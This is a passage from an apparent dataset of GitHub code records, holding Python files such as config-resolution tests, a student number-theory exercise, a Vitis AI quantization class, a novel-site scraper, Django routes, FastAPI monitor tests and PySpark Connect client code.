force_is_exe(monkeypatch):\n \"\"\"Mock resolve_config to recognize any string as an executable script.\"\"\"\n def is_exe(path):\n return True\n\n monkeypatch.setattr(resolve_config, \"is_exe\", is_exe)\n\n\ndef test_fetch_default_options():\n \"\"\"Verify default options\"\"\"\n resolve_config.DEF_CONFIG_FILES_PATHS = []\n default_config = resolve_config.fetch_default_options()\n\n assert default_config['algorithms'] == 'random'\n assert default_config['database']['host'] == socket.gethostbyname(socket.gethostname())\n assert default_config['database']['name'] == 'kleio'\n assert default_config['database']['type'] == 'MongoDB'\n\n assert default_config['max_trials'] == float('inf')\n assert default_config['name'] is None\n assert default_config['pool_size'] == 10\n\n\ndef test_fetch_env_vars():\n \"\"\"Verify env vars are fetched properly\"\"\"\n env_vars_config = resolve_config.fetch_env_vars()\n assert env_vars_config == {'database': {}}\n\n db_name = \"kleio_test\"\n\n os.environ['ORION_DB_NAME'] = db_name\n\n env_vars_config = resolve_config.fetch_env_vars()\n assert env_vars_config == {'database': {'name': 'kleio_test'}}\n\n db_type = \"MongoDB\"\n os.environ['ORION_DB_TYPE'] = db_type\n\n env_vars_config = resolve_config.fetch_env_vars()\n assert env_vars_config == {'database': {'name': db_name, 'type': db_type}}\n\n\n@pytest.mark.usefixtures(\"version_XYZ\")\ndef test_fetch_metadata_kleio_version():\n \"\"\"Verify kleio version\"\"\"\n metadata = resolve_config.fetch_metadata({})\n assert metadata['kleio_version'] == 'XYZ'\n\n\n@pytest.mark.usefixtures(\"force_is_exe\")\ndef test_fetch_metadata_executable_users_script():\n \"\"\"Verify executable user script with absolute path\"\"\"\n cmdargs = {'user_args': ['A']}\n metadata = resolve_config.fetch_metadata(cmdargs)\n assert metadata['user_script'] == os.path.abspath('A')\n\n\ndef test_fetch_metadata_non_executable_users_script():\n \"\"\"Verify executable user script keeps given path\"\"\"\n cmdargs = {'user_args': ['A']}\n metadata = resolve_config.fetch_metadata(cmdargs)\n assert metadata['user_script'] == 'A'\n\n\n@pytest.mark.usefixtures()\ndef test_fetch_metadata_user_args():\n \"\"\"Verify user args\"\"\"\n user_args = list(map(str, range(10)))\n cmdargs = {'user_args': user_args}\n metadata = resolve_config.fetch_metadata(cmdargs)\n assert metadata['user_script'] == user_args[0]\n assert metadata['user_args'] == user_args[1:]\n\n\n@pytest.mark.usefixtures(\"with_user_tsirif\")\ndef test_fetch_metadata_user_tsirif():\n \"\"\"Verify user name\"\"\"\n metadata = resolve_config.fetch_metadata({})\n assert metadata['user'] == \"tsirif\"\n\n\ndef test_fetch_metadata():\n \"\"\"Verify no additional data is stored in metadata\"\"\"\n metadata = resolve_config.fetch_metadata({})\n len(metadata) == 4\n\n\ndef test_fetch_config_no_hit():\n \"\"\"Verify fetch_config returns empty dict on no config file path\"\"\"\n config = resolve_config.fetch_config({\"config\": \"\"})\n assert config == {}\n\n\ndef test_fetch_config(config_file):\n \"\"\"Verify fetch_config returns valid dictionnary\"\"\"\n config = resolve_config.fetch_config({\"config\": config_file})\n\n assert config['algorithms'] == 'random'\n assert config['database']['host'] == 'mongodb://user:pass@localhost'\n assert config['database']['name'] == 'kleio_test'\n assert config['database']['type'] == 'mongodb'\n\n assert config['max_trials'] == 100\n assert config['name'] == 'voila_voici'\n assert config['pool_size'] == 1\n\n\ndef test_merge_configs_update_two():\n \"\"\"Ensure update on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'a': 3}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 3, 'b': 2}\n\n\ndef test_merge_configs_update_three():\n \"\"\"Ensure two updates on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'a': 3}\n c = {'b': 4}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 3, 'b': 4}\n\n\ndef test_merge_configs_update_four():\n \"\"\"Ensure three updates on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'a': 3}\n c = {'b': 4}\n d = {'a': 5, 'b': 6}\n\n m = resolve_config.merge_configs(a, b, c, d)\n\n assert m == {'a': 5, 'b': 6}\n\n\ndef test_merge_configs_extend_two():\n \"\"\"Ensure extension on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'c': 3}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': 2, 'c': 3}\n\n\ndef test_merge_configs_extend_three():\n \"\"\"Ensure two extensions on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'c': 3}\n c = {'d': 4}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 1, 'b': 2, 'c': 3, 'd': 4}\n\n\ndef test_merge_configs_extend_four():\n \"\"\"Ensure three extensions on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'c': 3}\n c = {'d': 4}\n d = {'e': 5}\n\n m = resolve_config.merge_configs(a, b, c, d)\n\n assert m == {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5}\n\n\ndef test_merge_configs_update_extend_two():\n \"\"\"Ensure update and extension on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'b': 3, 'c': 4}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': 3, 'c': 4}\n\n\ndef test_merge_configs_update_extend_three():\n \"\"\"Ensure two updates and extensions on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'b': 3, 'c': 4}\n c = {'a': 5, 'd': 6}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 5, 'b': 3, 'c': 4, 'd': 6}\n\n\ndef test_merge_configs_update_extend_four():\n \"\"\"Ensure three updates and extensions on first level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'b': 3, 'c': 4}\n c = {'a': 5, 'd': 6}\n d = {'d': 7, 'e': 8}\n\n m = resolve_config.merge_configs(a, b, c, d)\n\n assert m == {'a': 5, 'b': 3, 'c': 4, 'd': 7, 'e': 8}\n\n\ndef test_merge_sub_configs_update_two():\n \"\"\"Ensure updating to second level is fine\"\"\"\n a = {'a': 1, 'b': 2}\n b = {'b': {'c': 3}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 3}}\n\n\ndef test_merge_sub_configs_sub_update_two():\n \"\"\"Ensure updating on second level is fine\"\"\"\n a = {'a': 1, 'b': {'c': 2}}\n b = {'b': {'c': 3}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 3}}\n\n a = {'a': 1, 'b': {'c': 2, 'd': 3}}\n b = {'b': {'c': 4}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 4, 'd': 3}}\n\n\ndef test_merge_sub_configs_sub_extend_two():\n \"\"\"Ensure updating to third level from second level is fine\"\"\"\n a = {'a': 1, 'b': {'c': 2}}\n b = {'d': {'e': 3}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 2}, 'd': {'e': 3}}\n\n a = {'a': 1, 'b': {'c': 2, 'd': 3}}\n b = {'b': {'e': {'f': 4}}}\n\n m = resolve_config.merge_configs(a, b)\n\n assert m == {'a': 1, 'b': {'c': 2, 'd': 3, 'e': {'f': 4}}}\n\n\ndef test_merge_sub_configs_update_three():\n \"\"\"Ensure updating twice to third level from second level is fine\"\"\"\n a = {'a': 1, 'b': {'c': 2}}\n b = {'b': {'c': 3}}\n c = {'b': {'c': {'d': 4}}}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 1, 'b': {'c': {'d': 4}}}\n\n a = {'a': 1, 'b': {'c': 2, 'd': 3}}\n b = {'b': {'c': 4}}\n c = {'b': {'c': {'e': 5}}}\n\n m = resolve_config.merge_configs(a, b, c)\n\n assert m == {'a': 1, 'b': {'c': {'e': 5}, 'd': 3}}\n\n\ndef test_infer_versioning_metadata():\n \"\"\"Verify infer_versioning_metadata does nothing so far\n\n Test should be broken once the function is implemented\n \"\"\"\n metadata = {'hello': {'world': 0}}\n assert resolve_config.infer_versioning_metadata(metadata) == metadata\n","repo_name":"Epistimio/kleio","sub_path":"tests/unittests/core/io/test_resolve_config.py","file_name":"test_resolve_config.py","file_ext":"py","file_size_in_byte":7885,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"1626741819","text":"from numeros import eh_primo\nfrom numeros import lista_primos\nfrom numeros import conta_primos\nfrom numeros import eh_armstrong\nfrom numeros import eh_quase_armstrong\nfrom numeros import lista_armstrong\nfrom numeros import eh_perfeito\nfrom numeros import lista_perfeitos\n\n#Os comentários abaixo representam os resultados esperados pelos testes!\n\nteste_primos = [2, 5, 24, 19, 9, 30, 41]\n#true, true, false, true, false, false, true\nteste_lista_primos = 29\n#[2, 3, 5, 7, 11, 13, 17, 19, 23]\nteste_conta_primos = [97, 11, 8, 15, 11, 53, 11]\n#{11:3 53:1 97:1}\nteste_armstrong = [2, 10, 153, 15, 370, 4, 72]\n#true, false, true, false, true, true, false\nteste_quase_armstrong = [4, 35, 75]\n#false, true, true\nteste_lista_armstrong = 370\n#[1, 2, 3, 4, 5, 6, 7, 8, 9, 153]\nteste_perfeito = [4, 25, 28, 72, 496, 6]\n#false, false, true, false, true, true\nteste_lista_perfeitos = 496\n#[6,28]\n\ndef eh_primo(n):\n mtp=0\n if n>=2:\n for c_nt in range(2,n):\n if (n % c_nt == 0):\n mtp += 1\n if(mtp==0):\n return True\n else:\n return False\n else:\n return False\nprint(\"Teste eh_primo\")\nfor x in teste_primos:\n print(eh_primo(x), end=\" \")\nprint(\"\")\nprint(\"\")\n\ndef lista_primos(n):\n ln = [x for x in range(n)]\n l1 = list()\n l_dl = [x for x in ln if x != 0]\n for nmr in ln:\n tot_d = 0\n for dv in l_dl:\n if nmr % dv == 0:\n tot_d += 1\n elif nmr < dv:\n break\n if tot_d == 2:\n l1.append(nmr)\n return l1\nteste_lista_primos = 29\n# retorno [2, 3, 5, 7, 11, 13, 17, 19, 23]\nprint(\"Teste lista_primos\")\nprint(lista_primos(teste_lista_primos))\nprint(\"\")\n\ndef conta_primos(s):\n dc = dict()\n for aux in sorted(vlr):\n if eh_primo(aux):\n if aux in dc:\n dc[aux] += 1\n else:\n dc[aux] = 1\n return dc\nprint(\"Teste conta_primos\")\nprint(conta_primos(teste_conta_primos))\nprint(\"\")\n\ndef eh_armstrong(n):\n ordn = len(str(n))\n i = 0\n aux = n\n while aux > 0:\n digit = aux % 10\n i += digit ** ordn\n aux //= 10\n if (n == i):\n return True\n else:\n return False\nprint(\"Teste eh_armstrong\")\nfor x in teste_armstrong:\n print(eh_armstrong(x), end=\" \")\nprint(\"\")\nprint(\"\")\n\ndef eh_quase_armstrong(n):\n ordn = len(str(n))\n i = 0\n xuxa = n\n while xuxa > 0:\n digit = xuxa % 10\n i += digit ** ordn\n xuxa //= 10\n if (n == i-1)or(n==i+1)and(n>=0):\n return True\n else:\n return False\nprint(\"Teste eh_quase_armstrong\")\nfor x in teste_quase_armstrong:\n print(eh_quase_armstrong(x), end=\" \")\nprint(\"\")\nprint(\"\")\n\ndef lista_armstrong(n):\n l_1=list()\n soma=0\n for val in range(1,n-1):\n if(eh_armstrong(val)):\n l_1.append(val)\n elif(eh_armstrong==False):\n break\n return l_1\nprint(\"Teste lista_armstrong\")\nprint(lista_armstrong(teste_lista_armstrong))\nprint(\"\")\n\ndef eh_perfeito(n):\n totovs = 0\n for dv in range(1,n):\n if n % dv == 0:\n totovs += dv\n if n == totovs:\n return True\n else:\n return False\nprint(\"Teste eh_perfeito\")\nfor x in teste_perfeito:\n print(eh_perfeito(x), end=\" \")\nprint(\"\")\nprint(\"\")\n\ndef lista_perfeitos(n):\n l_1=list()\n soma=0\n for val in range(1,n-1):\n if(lista_perfeitos(val)):\n l_1.append(val)\n elif(lista_perfeitos==False):\n break\n return l_1\nprint(\"Teste lista_perfeitos\")\nprint(lista_perfeitos(teste_lista_perfeitos))\n\n","repo_name":"Erik-Masck/Exercicios-Python","sub_path":"test_numeros.py","file_name":"test_numeros.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11457091272","text":"from tensorflow_model_optimization.python.core.quantization.keras.vitis.base import quantize_strategy\nfrom tensorflow_model_optimization.python.core.quantization.keras.vitis.utils import common_utils\n\nQuantizeStrategy = quantize_strategy.QuantizeStrategy\nlogger = common_utils.VAILogger\n\n\nclass VitisQuantizeStrategy(QuantizeStrategy):\n \"\"\"Vitis Quantize Strategy.\"\"\"\n\n def update(self, qs_configs):\n \"\"\"Update the current configurations by overriding.\n\n Args:\n new_config: String, file name of the new quantize strategy configurations.\n\n Returns:\n None\n \"\"\"\n\n if 'optimize_pipeline_config' in qs_configs:\n self._optimize_pipeline.update(qs_configs.pop('optimize_pipeline_config'))\n if 'quantize_pipeline_config' in qs_configs:\n self._quantize_pipeline.update(qs_configs.pop('quantize_pipeline_config'))\n if 'refine_pipeline_config' in qs_configs:\n self._refine_pipeline.update(qs_configs.pop('refine_pipeline_config'))\n if 'finalize_pipeline_config' in qs_configs:\n self._finalize_pipeline.update(qs_configs.pop('finalize_pipeline_config'))\n if 'quantize_registry_config' in qs_configs:\n self._quantize_registry.update(qs_configs.pop('quantize_registry_config'))\n\n invalid_configs = []\n while qs_configs:\n config = qs_configs.popitem()\n if self._quantize_registry.is_valid_config(config):\n self._quantize_registry.update(config)\n elif self._optimize_pipeline.is_valid_config(config):\n self._optimize_pipeline.update(config)\n elif self._quantize_pipeline.is_valid_config(config):\n self._quantize_pipeline.update(config)\n elif self._refine_pipeline.is_valid_config(config):\n self._refine_pipeline.update(config)\n elif self._finalize_pipeline.is_valid_config(config):\n self._finalize_pipeline.update(config)\n else:\n invalid_configs.append(config)\n\n # Check for invalid configurations\n if invalid_configs:\n logger.error('Invalid configs: {}'.format(invalid_configs))\n\n self._qs_configs.update({\n 'quantize_registry_config': self._quantize_registry.get_configs(),\n 'optimize_pipeline_config': self._optimize_pipeline.get_configs(),\n 'quantize_pipeline_config': self._quantize_pipeline.get_configs(),\n 'refine_pipeline_config': self._refine_pipeline.get_configs(),\n 'finalize_pipeline_config': self._finalize_pipeline.get_configs(),\n })\n\n # Interface functions\n def get_configs(self):\n return self._qs_configs\n\n def get_quantize_registry(self):\n \"\"\"Return the quantize registry including the input quantize configurations\n and the detailed configurations for keras and vitis layers.\n\n Args:\n None\n\n Returns:\n A VitisQuantizeRegistry object.\n \"\"\"\n return self._quantize_registry\n\n def get_optimize_pipeline(self):\n \"\"\"Return the TransformsPipeline of the pre-quantization optimization processes.\n\n Args:\n None\n\n Returns:\n A TransformsPipeline object.\n \"\"\"\n return self._optimize_pipeline\n\n def get_quantize_pipeline(self):\n \"\"\"Return the TransformsPipeline of the main quantization processes.\n\n Args:\n None\n\n Returns:\n A TransformsPipeline object.\n \"\"\"\n return self._quantize_pipeline\n\n def get_refine_pipeline(self):\n \"\"\"Return the TransformsPipeline of the post-quantization refinement processes.\n\n Args:\n None\n\n Returns:\n A TransformsPipeline object.\n \"\"\"\n return self._refine_pipeline\n\n def get_finalize_pipeline(self):\n \"\"\"Return the TransformsPipeline of the finalize processes.\n\n Args:\n None\n\n Returns:\n A TransformsPipeline object.\n \"\"\"\n return self._finalize_pipeline\n","repo_name":"Xilinx/Vitis-AI","sub_path":"src/vai_quantizer/vai_q_tensorflow2.x/tensorflow_model_optimization/python/core/quantization/keras/vitis/common/vitis_quantize_strategy.py","file_name":"vitis_quantize_strategy.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":1266,"dataset":"github-code","pt":"78"} +{"seq_id":"18533787319","text":"from logging import getLogger, StreamHandler, DEBUG\nlogger = getLogger(__name__)\nhandler = StreamHandler()\nhandler.setLevel(DEBUG)\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\nlogger.propagate = False\n\nimport os\nimport time\nimport datetime\nimport csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom datetime import timedelta\n\n\ndef main():\n \"\"\"\n メイン処理\n \"\"\"\n # --------------------------------------\n # 作品ページのURLを指定(コメントアウト・コメントインで指定できるようにしています)\n t0=time.time()\n if not os.path.exists(\"corpus\"):\n os.makedirs(\"corpus\")\n\n with open(\"real_list\", \"r\") as n:\n ncode=n.read().splitlines()\n with open(\"log.txt\", 'r') as log:\n x=log.read()\n ncode=ncode[50000:]\n ncode=ncode[int(x):]\n\n for i, nc in enumerate(ncode):\n url = 'https://ncode.syosetu.com/{}/'.format(nc)\n stories = \"\"\n bs_obj = make_bs_obj(url)\n if bs_obj is None:\n continue\n else:\n pass\n time.sleep(1)\n\n url_list = [\"https://ncode.syosetu.com\" + a_bs_obj.find(\"a\").attrs[\"href\"] for a_bs_obj in bs_obj.findAll(\"dl\", {\"class\": \"novel_sublist2\"})]\n date_list = bs_obj.findAll(\"dt\",{\"class\":\"long_update\"})\n novel_title = bs_obj.find(\"p\",{\"class\":\"novel_title\"}).get_text()\n for s in r'\\/*?\"<>:|':\n novel_title = novel_title.replace(s, '')\n\n # 各話の本文情報を取得\n for j in range(len(url_list)):\n url = url_list[j]\n bs_obj = make_bs_obj(url)\n if bs_obj is None:\n continue\n else:\n pass\n time.sleep(0.3)\n stories = stories + get_main_text(bs_obj)\n \n f = open('corpus/{}.txt'.format(nc), 'w')\n f.write(stories)\n f.close()\n logger.debug('{}.txt is writen.'.format(nc))\n t1=time.time()\n deltat=t1-t0\n timeleft=timedelta(seconds=deltat*(len(ncode)/(i+1)-1))\n logger.debug(f'duration:{timedelta(deltat)}, time left:{timeleft}')\n print(\"進捗:{}/{}, {}%\".format(i, len(ncode), i*100//len(ncode)))\n with open(\"log.txt\", 'w') as log:\n log.write(str(i+int(x)+1))\n\n\n\ndef make_bs_obj(url):\n \"\"\"\n BeautifulSoupObjectを作成\n \"\"\"\n html = urlopen(url)\n logger.debug('access {} ...'.format(url))\n if html is None:\n return None\n else:\n return BeautifulSoup(html,\"html.parser\")\n\ndef get_main_text(bs_obj):\n \"\"\"\n 各話のコンテンツをスクレイピング\n \"\"\"\n text = \"\"\n text_htmls = bs_obj.findAll(\"div\",{\"id\":\"novel_honbun\"})[0].findAll(\"p\")\n\n for text_html in text_htmls:\n text = text + text_html.get_text() + \"\\n\"\n\n return text\n\ndef save_as_csv(stories, nc):\n \"\"\"\n csvファイルにデータを保存\n \"\"\"\n # バックアップファイルの保存先の指定\n directory_name = \"novels\"\n # ディレクトリが存在しなければ作成する\n if not os.path.exists(directory_name):\n os.makedirs(directory_name)\n\n # ファイル名の作成\n csv_name = os.path.join(directory_name, '{}.csv'.format(nc))\n\n # 列名(1行目)を作成\n col_name = ['No', 'title', 'url', 'date', 'text']\n\n with open(csv_name, 'w', newline='', encoding='utf-8') as output_csv:\n csv_writer = csv.writer(output_csv)\n csv_writer.writerow(col_name) # 列名を記入\n\n # csvに1行ずつ書き込み\n for story in stories:\n row_items = [story['No'], story['title'], story['url'], story['date'], story['text']]\n csv_writer.writerow(row_items)\n\n print(csv_name, ' saved...')\n\n\n\nmain()\n","repo_name":"uzuki-sae/About_Syousetsuka_ni_narou","sub_path":"get_text.py","file_name":"get_text.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9393320584","text":"from django.conf.urls import url\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom . import views\n\napp_name = 'accounts'\n\nurlpatterns = [\n url(r'^$', views.HomeView.as_view(), name='index'),\n url(r'^login/$', LoginView.as_view(template_name='accounts/login.html'), name='login'),\n url(r'^logout/$', LogoutView.as_view(template_name='accounts/logout.html'), name='logout'),\n url(r'^create/$', views.SignUpView.as_view(), name='create'),\n #url(r'^check/(?P[0-9]+)/$', views.CheckView.as_view(), name='check'),\n #url(r'^update/(?P[0-9]+)/$', views.CorrectView.as_view(), name='update'),\n url(r'^success/$', views.SuccessView.as_view(), name='success'),\n url(r'^profile/$', views.LoginSuccessView.as_view(), name='loginSuccess'),\n url(r'^person/$', views.PersonView.as_view(), name='person')\n]","repo_name":"gitter-badger/LION","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41601476056","text":"import streamlit as st\nfrom data import Data\nfrom models_strategy_pattern.model_types import ModelTypes\n\n''' \n Get tweet embeddings\n\nA very crucial step is to be able to get sentence embeddings in this project. This is important because\nthis project is a big unsupervised problem as it is. Being able to get texts and label them as positive,\nnegative, or neutral. Clustering tweets will also be a thing, and that of course revolves around embeddings\nas well.\n \n'''\n\nclass GetTweetEmbeddings(Data):\n def __init__(self): \n super().__init__()\n \n self.m_details = ''' To understand sentence embeddings, it's worth going over **_word_** embeddings as well. A word\n embedding is basically a vector or numerical representation of a single word and is able to identify the syntaxes.\n Some famous word embedding libraries are Word2Vec, and GloVe, but there's a few more out there. Sentence embeddings\n are basically the same thing except with of course sentences. With sentence embeddings, it's possible to retain context\n in which a certain word was used IN the sentence. '''\n\n self.m_conversion_details = ''' Embeddings for words and sentences are long vectors/arrays/lists of different sizes. A \n typical size for an embedding is 768, especially with more popular models. The idea is that any sentence (or tweet in\n this case) can be a **long** vector of floating point values. This has to be done of course since models don't understand\n text but only numbers. '''\n\n \n\n def Display(self):\n print('get_tweet_embeddings.py check 1.')\n st.title('Get Tweets Embeddings')\n\n st.write('')\n st.write('')\n st.write(self.m_details)\n\n st.write('')\n st.write('')\n st.write('')\n st.write('### Convert the tweets into embeddings')\n st.write(self.m_conversion_details)\n \n st.write('')\n st.write('')\n st.write('')\n st.write('### Display the embedded tweets')\n\n st.session_state.m_model_class.Predict() # Argument is a list.\n\n # The model is chosen, now the user can proceed to the next page.\n st.session_state.can_change_page = True\n print('get_tweet_embeddings.py check 2.')\n\n\n\n def ModelCompatibilityCheck(self):\n model_class = st.session_state.m_model_class\n\n if self.ModelTypeCheck(model_class, self.__class__.__name__, ModelTypes.Embedding, True):\n return True\n\n # When the page is going to be skipped, increment variable that controls which class is displayed to get to the proper next class.\n st.session_state.list_index += 1\n \n return False","repo_name":"axiom2018/Live-Twitter-Sentiment-Analysis","sub_path":"get_tweet_embeddings.py","file_name":"get_tweet_embeddings.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8281134766","text":"import datetime\nimport json\nimport re\n\nimport mongomock\nimport pytest\nfrom fastapi.testclient import TestClient\n\nfrom backend.models import UpdateMonitorModel\nfrom shared.models import CheckModel, MonitorModel, ResultModel\nfrom shared.mongo import (MONGO_DB_NAME, MONITORS_COLLECTION_NAME,\n get_prod_client)\n\nfrom ..main import app\n\nmongo_test_client = mongomock.MongoClient()\n\n\ndef get_mongo_test_client():\n return mongo_test_client\n\n\n@pytest.fixture(autouse=True)\ndef run_around_tests(requests_mock):\n app.dependency_overrides[get_prod_client] = get_mongo_test_client\n requests_mock.get(re.compile('/scheduler/*'))\n # clean db before every test\n mongo_test_client.drop_database(MONGO_DB_NAME)\n yield\n\n\n@pytest.fixture()\ndef example_monitor_id():\n return \"666f6f2d6261722d71757578\"\n\n\n@pytest.fixture()\ndef example_monitor(example_monitor_id):\n monitor = MonitorModel(\n description=\"this is a test monitor\",\n url=\"http://httpbin.org/post\",\n method=\"POST\",\n body=\"{\\\"hello\\\":\\\"world\\\"}\",\n checks=CheckModel(expected_status=200),\n results=[ResultModel(status=200, time=datetime.datetime.now(), content='wow',\n duration_ms=5000, headers={}, checked_with=CheckModel(expected_status=200))]\n ).dict()\n\n monitor['_id'] = example_monitor_id\n\n return monitor\n\n\n@pytest.fixture()\ndef example_update_monitor():\n return UpdateMonitorModel(\n description=\"updated_description\",\n url=\"http://httpbin.org/get\",\n method=\"GET\",\n body=\"\",\n checks=CheckModel(expected_status=404)\n ).dict()\n\n\ndef test_now_allowed():\n client = TestClient(app)\n response = client.post('/monitors/v1/getmonitors/false')\n\n assert response.status_code == 405\n\n\n@pytest.mark.parametrize(\"with_results,results_len\", [(False, 0), (True, 1)])\ndef test_with_results(example_monitor, with_results, results_len):\n db = mongo_test_client[MONGO_DB_NAME]\n collection = db[MONITORS_COLLECTION_NAME]\n collection.insert_one(example_monitor)\n\n client = TestClient(app)\n response = client.get(f'/monitors/v1/getmonitors/{with_results}')\n result = response.json()\n\n assert response.status_code == 200\n assert len(result) == 1\n assert len(result[0]['results']) == results_len\n\n\ndef test_update_nonexistent(example_update_monitor):\n nonexistent_id = '12345678'\n\n client = TestClient(app)\n response = client.put(\n f'/monitors/v1/{nonexistent_id}', json=example_update_monitor)\n\n assert response.status_code == 404\n assert response.json()['detail'] == f\"Monitor {nonexistent_id} not found\"\n\n\ndef test_update(example_monitor, example_monitor_id, example_update_monitor):\n db = mongo_test_client[MONGO_DB_NAME]\n collection = db[MONITORS_COLLECTION_NAME]\n collection.insert_one(example_monitor)\n\n client = TestClient(app)\n\n response = client.put(\n f'/monitors/v1/{example_monitor_id}', json=example_update_monitor)\n\n assert response.status_code == 200\n\n result = response.json()\n\n for field in example_update_monitor:\n assert result[field] == (\n example_monitor[field] if example_update_monitor[field] is None else example_update_monitor[field])\n\n\ndef test_id_not_found(example_monitor_id):\n client = TestClient(app)\n response = client.get(f'/monitors/v1/{example_monitor_id}')\n\n assert response.status_code == 404\n assert response.json()[\n 'detail'] == f\"Monitor {example_monitor_id} not found\"\n\n\ndef test_get_monitors_empty():\n client = TestClient(app)\n response = client.get('/monitors/v1/getmonitors/false')\n\n assert response.status_code == 200\n assert response.json() == []\n\n\ndef test_create_monitor(example_monitor):\n del example_monitor['id']\n del example_monitor['results']\n\n client = TestClient(app)\n response = client.post(\n f'/monitors/v1', json=json.loads(json.dumps(example_monitor, default=str)))\n\n assert response.status_code == 201\n\n result = response.json()\n\n for field in example_monitor:\n assert result[field] == example_monitor[field]\n\n\ndef test_get_monitor(example_monitor, example_monitor_id):\n db = mongo_test_client[MONGO_DB_NAME]\n collection = db[MONITORS_COLLECTION_NAME]\n collection.insert_one(example_monitor)\n\n client = TestClient(app)\n\n response = client.get(f'/monitors/v1/{example_monitor_id}')\n\n assert response.status_code == 200\n assert response.json()['_id'] == example_monitor_id\n\n\ndef test_delete_monitor(example_monitor, example_monitor_id):\n db = mongo_test_client[MONGO_DB_NAME]\n collection = db[MONITORS_COLLECTION_NAME]\n collection.insert_one(example_monitor)\n\n client = TestClient(app)\n\n response = client.delete(f'/monitors/v1/{example_monitor_id}')\n\n assert response.status_code == 204\n","repo_name":"EASS-HIT-PART-A-2022-CLASS-III/Monitorman","sub_path":"backend/tests/test_backend.py","file_name":"test_backend.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25466536085","text":"import os\nimport urllib.parse\nimport uuid\nfrom typing import Iterable, Optional, Any, Union, List, Tuple, Dict\n\nimport grpc\nimport pandas\nimport pyarrow as pa\n\nimport pyspark.sql.connect.proto as pb2\nimport pyspark.sql.connect.proto.base_pb2_grpc as grpc_lib\nimport pyspark.sql.connect.types as types\nimport pyspark.sql.types\nfrom pyspark import cloudpickle\nfrom pyspark.sql.types import (\n DataType,\n StructType,\n StructField,\n)\n\n\nclass ChannelBuilder:\n \"\"\"\n This is a helper class that is used to create a GRPC channel based on the given\n connection string per the documentation of Spark Connect.\n\n .. versionadded:: 3.4.0\n\n Examples\n --------\n >>> cb = ChannelBuilder(\"sc://localhost\")\n ... cb.endpoint\n \"localhost:15002\"\n\n >>> cb = ChannelBuilder(\"sc://localhost/;use_ssl=true;token=aaa\")\n ... cb.secure\n True\n \"\"\"\n\n PARAM_USE_SSL = \"use_ssl\"\n PARAM_TOKEN = \"token\"\n PARAM_USER_ID = \"user_id\"\n\n DEFAULT_PORT = 15002\n\n def __init__(self, url: str) -> None:\n # Explicitly check the scheme of the URL.\n if url[:5] != \"sc://\":\n raise AttributeError(\"URL scheme must be set to `sc`.\")\n # Rewrite the URL to use http as the scheme so that we can leverage\n # Python's built-in parser.\n tmp_url = \"http\" + url[2:]\n self.url = urllib.parse.urlparse(tmp_url)\n self.params: Dict[str, str] = {}\n if len(self.url.path) > 0 and self.url.path != \"/\":\n raise AttributeError(\n f\"Path component for connection URI must be empty: {self.url.path}\"\n )\n self._extract_attributes()\n\n def _extract_attributes(self) -> None:\n if len(self.url.params) > 0:\n parts = self.url.params.split(\";\")\n for p in parts:\n kv = p.split(\"=\")\n if len(kv) != 2:\n raise AttributeError(f\"Parameter '{p}' is not a valid parameter key-value pair\")\n self.params[kv[0]] = urllib.parse.unquote(kv[1])\n\n netloc = self.url.netloc.split(\":\")\n if len(netloc) == 1:\n self.host = netloc[0]\n self.port = ChannelBuilder.DEFAULT_PORT\n elif len(netloc) == 2:\n self.host = netloc[0]\n self.port = int(netloc[1])\n else:\n raise AttributeError(\n f\"Target destination {self.url.netloc} does not match ':' pattern\"\n )\n\n def metadata(self) -> Iterable[Tuple[str, str]]:\n \"\"\"\n Builds the GRPC specific metadata list to be injected into the request. All\n parameters will be converted to metadata except ones that are explicitly used\n by the channel.\n\n Returns\n -------\n A list of tuples (key, value)\n \"\"\"\n return [\n (k, self.params[k])\n for k in self.params\n if k\n not in [\n ChannelBuilder.PARAM_TOKEN,\n ChannelBuilder.PARAM_USE_SSL,\n ChannelBuilder.PARAM_USER_ID,\n ]\n ]\n\n @property\n def secure(self) -> bool:\n if self._token is not None:\n return True\n\n value = 